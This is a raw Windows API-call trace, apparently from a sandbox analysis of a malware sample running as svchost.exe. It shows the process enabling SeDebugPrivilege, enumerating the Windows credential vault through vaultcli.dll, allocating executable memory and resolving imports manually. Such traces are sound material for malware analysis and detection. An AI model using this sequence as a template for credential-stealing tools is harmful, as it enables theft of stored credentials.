	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentPackageId") returned 0x0
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="GetTickCount64") returned 0x76b4eb4e
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileInformationByHandleEx") returned 0x76b538ad
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="SetFileInformationByHandle") returned 0x76b48d0f
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeConditionVariable") returned 0x77389981
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="WakeConditionVariable") returned 0x773d5a7b
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="WakeAllConditionVariable") returned 0x773545a5
	[0198.250] GetProcAddress (hModule=0x76b10000, lpProcName="SleepConditionVariableCS") returned 0x76b418be
	[0198.250] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeSRWLock") returned 0x77389981
	[0198.250] GetProcAddress (hModule=0x76b10000, lpProcName="AcquireSRWLockExclusive") returned 0x7738334e
	[0198.250] GetProcAddress (hModule=0x76b10000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77361801
	[0198.250] GetProcAddress (hModule=0x76b10000, lpProcName="ReleaseSRWLockExclusive") returned 0x77383324
	[0198.250] GetProcAddress (hModule=0x76b10000, lpProcName="SleepConditionVariableSRW") returned 0x76b423f5
	[0198.250] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThreadpoolWork") returned 0x76b489f2
	[0198.250] GetProcAddress (hModule=0x76b10000, lpProcName="SubmitThreadpoolWork") returned 0x773426a9
	[0198.250] GetProcAddress (hModule=0x76b10000, lpProcName="CloseThreadpoolWork") returned 0x77342111
	[0198.250] GetProcAddress (hModule=0x76b10000, lpProcName="CompareStringEx") returned 0x76b6ebc6
	[0198.250] GetProcAddress (hModule=0x76b10000, lpProcName="GetLocaleInfoEx") returned 0x76b453a5
	[0198.250] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringEx") returned 0x76b9f72b
	[0198.250] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x800) returned 0x38f860
	[0198.250] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0198.250] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1010b060, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x14) returned 0x38e050
	[0198.251] GetEnvironmentStringsW () returned 0x390068*
	[0198.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1149, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1149
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x47d) returned 0x390970
	[0198.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1149, lpMultiByteStr=0x390970, cbMultiByte=1149, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1149
	[0198.251] FreeEnvironmentStringsW (penv=0x390068) returned 1
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x84) returned 0x390df8
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1f) returned 0x38f708
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2e) returned 0x38a1e0
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x31) returned 0x390e88
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x16) returned 0x390ec8
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x24) returned 0x389c68
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x14) returned 0x390ee8
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xd) returned 0x38d9f0
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1d) returned 0x38f730
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x31) returned 0x390f08
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x17) returned 0x390f48
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x17) returned 0x390f68
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xe) returned 0x38da08
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x8d) returned 0x390068
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x3e) returned 0x384678
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1b) returned 0x38f758
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x44) returned 0x386050
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x12) returned 0x390f88
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x18) returned 0x390fa8
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1b) returned 0x38f780
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1e) returned 0x38f7a8
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x41) returned 0x3860a0
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x17) returned 0x390fc8
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xf) returned 0x38da20
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x16) returned 0x390100
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2a) returned 0x38a218
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x29) returned 0x38a250
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x14) returned 0x390138
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x16) returned 0x390158
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x22) returned 0x389c98
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x12) returned 0x390178
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x18) returned 0x390198
	[0198.251] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x46) returned 0x3860f0
	[0198.251] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390970 | out: hHeap=0x370000) returned 1
	[0198.252] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x28) returned 0x389cc8
	[0198.252] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40) returned 0x3846c0
	[0198.252] ResetEvent (hEvent=0x8) returned 1
	[0198.252] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.257] GetCurrentProcess () returned 0xffffffff
	[0198.257] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x22fc44 | out: TokenHandle=0x22fc44*=0x90) returned 1
	[0198.257] LookupPrivilegeValueA (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x22fc3c | out: lpLuid=0x22fc3c*(LowPart=0x14, HighPart=0)) returned 1
	[0198.259] AdjustTokenPrivileges (in: TokenHandle=0x90, DisableAllPrivileges=0, NewState=0x22fc2c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0198.259] CloseHandle (hObject=0x90) returned 1
	[0198.259] GetProcessHeap () returned 0x370000
	[0198.259] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2c) returned 0x38a288
	[0198.259] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x73940000
	[0198.369] GetProcAddress (hModule=0x73940000, lpProcName="VaultEnumerateItems") returned 0x73943099
	[0198.369] GetProcAddress (hModule=0x73940000, lpProcName="VaultEnumerateVaults") returned 0x73942945
	[0198.369] GetProcAddress (hModule=0x73940000, lpProcName="VaultFree") returned 0x73944321
	[0198.369] GetProcAddress (hModule=0x73940000, lpProcName="VaultGetItem") returned 0x73943242
	[0198.369] GetProcAddress (hModule=0x73940000, lpProcName="VaultGetItem") returned 0x73943242
	[0198.369] GetProcAddress (hModule=0x73940000, lpProcName="VaultOpenVault") returned 0x739426a9
	[0198.369] GetProcAddress (hModule=0x73940000, lpProcName="VaultCloseVault") returned 0x73942718
	[0198.369] GetVersionExW (in: lpVersionInformation=0x22e8f4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x22e9c0, dwMinorVersion=0x2, dwBuildNumber=0x0, dwPlatformId=0x3824b8, szCSDVersion="\xe914\x22\x2718\x7394") | out: lpVersionInformation=0x22e8f4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0198.369] VaultEnumerateVaults () returned 0x0
	[0198.900] VaultOpenVault () returned 0x0
	[0198.901] VaultEnumerateItems () returned 0x0
	[0198.901] VaultFree () returned 0x0
	[0198.901] VaultCloseVault () returned 0x6
	[0198.901] VaultOpenVault () returned 0x0
	[0198.902] VaultEnumerateItems () returned 0x0
	[0198.903] VaultFree () returned 0x0
	[0198.903] VaultCloseVault () returned 0x6
	[0198.903] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1) returned 0x390920
	[0198.903] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a288 | out: hHeap=0x370000) returned 1
	[0198.903] GetCurrentProcess () returned 0xffffffff
	[0198.903] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x22fc40 | out: TokenHandle=0x22fc40*=0xdc) returned 1
	[0198.903] GetTokenInformation (in: TokenHandle=0xdc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22fc44 | out: TokenInformation=0x0, ReturnLength=0x22fc44) returned 0
	[0198.903] GetLastError () returned 0x7a
	[0198.903] GetTokenInformation (in: TokenHandle=0xdc, TokenInformationClass=0x1, TokenInformation=0x389e78, TokenInformationLength=0x24, ReturnLength=0x22fc44 | out: TokenInformation=0x389e78, ReturnLength=0x22fc44) returned 1
	[0198.903] ConvertSidToStringSidW () returned 0x1
	[0198.903] _wcsicmp (_Str1="S-1-5-18", _Str2="S-1-5-21-3727408139-63090477-3136880571-1000") returned -1
	[0198.903] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2c) returned 0x38a288
	[0198.903] VirtualAlloc (lpAddress=0x0, dwSize=0x35200, flAllocationType=0x3000, flProtect=0x4) returned 0x480000
	[0198.908] VirtualAlloc (lpAddress=0x0, dwSize=0x3b000, flAllocationType=0x3000, flProtect=0x40) returned 0x4c0000
	[0198.910] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x22fb94, Source="KERNEL32.dll" | out: Destination="KERNEL32.dll") returned 1
	[0198.910] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x22fbbc | out: BaseAddress=0x22fbbc*=0x76b10000) returned 0x0
	[0198.910] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="EnterCriticalSection", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x773777a0) returned 0x0
	[0198.910] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="LeaveCriticalSection", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x77377760) returned 0x0
	[0198.910] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="InitializeCriticalSection", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x7738a149) returned 0x0
	[0198.910] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="CloseHandle", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5ca7c) returned 0x0
	[0198.910] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="DeleteCriticalSection", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x77389ac5) returned 0x0
	[0198.910] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="SetEvent", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5bccc) returned 0x0
	[0198.910] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="ResetEvent", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5bcb4) returned 0x0
	[0198.910] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="WaitForSingleObjectEx", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5bab0) returned 0x0
	[0198.910] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="CreateEventW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b63386) returned 0x0
	[0198.910] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetModuleHandleW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b6374d) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b633d3) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="IsDebuggerPresent", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b53ea8) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="UnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b6ed38) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="SetUnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b63d01) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetStartupInfoW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b63891) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="IsProcessorFeaturePresent", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b676b5) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="QueryPerformanceCounter", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5bb9f) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetCurrentProcessId", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5cac4) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetCurrentThreadId", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5bb80) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetSystemTimeAsFileTime", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b62fde) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="InitializeSListHead", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x77395eeb) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetCurrentProcess", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5cdcf) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="TerminateProcess", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b52331) returned 0x0
	[0198.911] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="WideCharToMultiByte", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b6450e) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="EncodePointer", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x7738a295) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="DecodePointer", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x7738cd10) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="MultiByteToWideChar", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b6452b) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="SetLastError", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5bb08) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="InitializeCriticalSectionAndSpinCount", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b63939) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="TlsAlloc", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b635a1) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="TlsGetValue", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5da70) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="TlsSetValue", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5da88) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="TlsFree", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b613b8) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="LCMapStringW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b613d0) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetLocaleInfoW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b66596) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetStringTypeW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b667c8) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetCPInfo", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b61e2e) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetLastError", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5bf00) returned 0x0
	[0198.912] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="FreeLibrary", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5d9d0) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="LoadLibraryExW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b54775) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="RaiseException", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b4eb60) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="InterlockedFlushSList", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x77383129) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="RtlUnwind", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b47f70) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="ExitProcess", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b6214f) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetModuleHandleExW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b53e39) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetModuleFileNameA", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b633f6) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="HeapAlloc", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x77382dd6) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="HeapReAlloc", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x7739ff51) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="HeapFree", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5bbd0) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetACP", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b639aa) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetStdHandle", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b61e46) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetFileType", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b675a5) returned 0x0
	[0198.913] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="IsValidLocale", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b53de4) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetUserDefaultLCID", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b66584) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="EnumSystemLocalesW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b9f3df) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="FindClose", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b60e62) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="FindFirstFileExA", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b9f3ef) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="FindNextFileA", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5a187) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="IsValidCodePage", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b6c1c0) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetOEMCP", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b53db9) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetCommandLineA", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b698ff) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetCommandLineW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b6679e) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetEnvironmentStringsW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b61dbc) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="FreeEnvironmentStringsW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b61dc3) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetProcessHeap", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b61280) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="FlushFileBuffers", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b47f81) returned 0x0
	[0198.914] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="WriteFile", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b61400) returned 0x0
	[0198.915] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetConsoleCP", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b62c8a) returned 0x0
	[0198.915] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="GetConsoleMode", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b62412) returned 0x0
	[0198.915] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="ReadFile", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b596fb) returned 0x0
	[0198.915] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="SetFilePointerEx", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b4f5b2) returned 0x0
	[0198.915] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="SetStdHandle", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b9f589) returned 0x0
	[0198.915] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="HeapSize", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x77389bec) returned 0x0
	[0198.915] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="WriteConsoleW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b582f1) returned 0x0
	[0198.915] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="ReadConsoleW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b70e73) returned 0x0
	[0198.915] LdrGetProcedureAddress (in: BaseAddress=0x76b10000, Name="CreateFileW", Ordinal=0x0, ProcedureAddress=0x22fbb4 | out: ProcedureAddress=0x22fbb4*=0x76b5cc56) returned 0x0
	[0198.915] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fba0 | out: lpSystemTimeAsFileTime=0x22fba0*(dwLowDateTime=0x5fc8cd00, dwHighDateTime=0x1d50a6a)) 
	[0198.915] GetCurrentThreadId () returned 0x524
	[0198.915] GetCurrentProcessId () returned 0x6d8
	[0198.915] QueryPerformanceCounter (in: lpPerformanceCount=0x22fb98 | out: lpPerformanceCount=0x22fb98*=27275320203) returned 1
	[0198.915] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0198.915] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
